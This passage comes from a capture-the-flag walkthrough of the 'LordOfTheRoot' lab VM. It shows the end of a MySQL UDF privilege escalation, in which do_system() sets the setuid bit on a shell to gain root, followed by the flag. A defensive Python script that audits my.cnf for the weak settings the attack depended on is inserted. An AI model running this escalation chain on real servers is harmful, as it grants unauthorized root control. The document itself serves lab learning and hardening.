| do_system('chmod u+s /home/smeagol/shell') |
+------------------------------------------------+
|                                              0 |
+------------------------------------------------+
1 row in set (0.00 sec)

mysql> exit
Bye
smeagol@LordOfTheRoot:~$ ./shell 
root@LordOfTheRoot:~#
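The chain above needed two server-side preconditions: mysqld running as root, and load_file()/INTO DUMPFILE being free to write into plugin_dir. As an added example (not from the VM, the 1518 exploit or linuxprivchecker), here is a small audit of a my.cnf [mysqld] section for exactly those settings; the option names are real mysqld options, and the two sample configurations are constructed.

```python
"""Audit the two MySQL settings the UDF privilege-escalation chain above
relied on: mysqld running as root (so do_system() runs as uid 0) and
unrestricted load_file()/INTO DUMPFILE (so a library can be dropped into
plugin_dir and registered with CREATE FUNCTION).

Added example, not from the VM or linuxprivchecker. Option names are real
mysqld options; the two configuration samples below are constructed."""
import os


def parse_mysqld_section(text):
    """Minimal my.cnf reader returning the [mysqld] options as a dict.
    Names are normalised ('plugin-dir' and 'plugin_dir' are the same option);
    bare options such as skip-external-locking map to True."""
    section, opts = None, {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("!", ";")):
            continue                      # blank, comment, or !includedir
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "mysqld":
            continue
        key, sep, value = line.partition("=")
        key = key.strip().lower().replace("-", "_")
        opts[key] = value.strip().strip("'\"") if sep else True
    return opts


def audit_mysqld(text):
    """Return a list of findings; an empty list means neither precondition holds."""
    opts = parse_mysqld_section(text)
    findings = []

    user = opts.get("user")
    if user == "root":
        findings.append("mysqld runs as root: any UDF registered in mysql.func "
                        "executes with uid 0")
    elif user is None:
        findings.append("no user= in [mysqld]: confirm the running uid "
                        "(ps -o user= -C mysqld)")

    sfp = opts.get("secure_file_priv")
    if not isinstance(sfp, str) or sfp == "":
        findings.append("secure_file_priv unset: load_file() and INTO DUMPFILE "
                        "can read/write anywhere the server user can, "
                        "including plugin_dir")
    elif sfp.upper() != "NULL":           # NULL disables file import/export
        plugin_dir = opts.get("plugin_dir")
        if isinstance(plugin_dir, str) and \
                os.path.normpath(sfp) == os.path.normpath(plugin_dir):
            findings.append("secure_file_priv points at plugin_dir: DUMPFILE "
                            "can still land a loadable library")
    return findings


# Constructed: mirrors what the walkthrough observed (mysqld as root, and a
# DUMPFILE into /usr/lib/mysql/plugin that succeeded).
WEAK_CNF = """\
[client]
port = 3306

[mysqld]
user = root
port = 3306
basedir = /usr
datadir = /var/lib/mysql
plugin-dir = /usr/lib/mysql/plugin
skip-external-locking
# It has been reported that passwords should be enclosed with ticks/quotes
!includedir /etc/mysql/conf.d/
"""

# Constructed: unprivileged service account, file operations confined to a
# directory that is not plugin_dir.
HARDENED_CNF = """\
[mysqld]
user = mysql
plugin-dir = /usr/lib/mysql/plugin
secure-file-priv = /var/lib/mysql-files
"""


if __name__ == "__main__":
    for name, cnf in (("weak", WEAK_CNF), ("hardened", HARDENED_CNF)):
        print(name, "->", audit_mysqld(cnf) or ["no findings"])
```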

There you go, we got the root shell. I quickly searched for the flag, which was in the /root folder, and here is what it had to say.

root@LordOfTheRoot:~# cat /root/Flag.txt 
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”
– Gandalf

Takeaways:

  • Passion, patience and hard work
  • Never give up.
  • Keep solving Vulnerable VMs 😛

Thanks a lot KookSec and Vulnhub for this VM!!


Author: Gray Wolf

Son, Brother and Cyber Security Enthusiast...
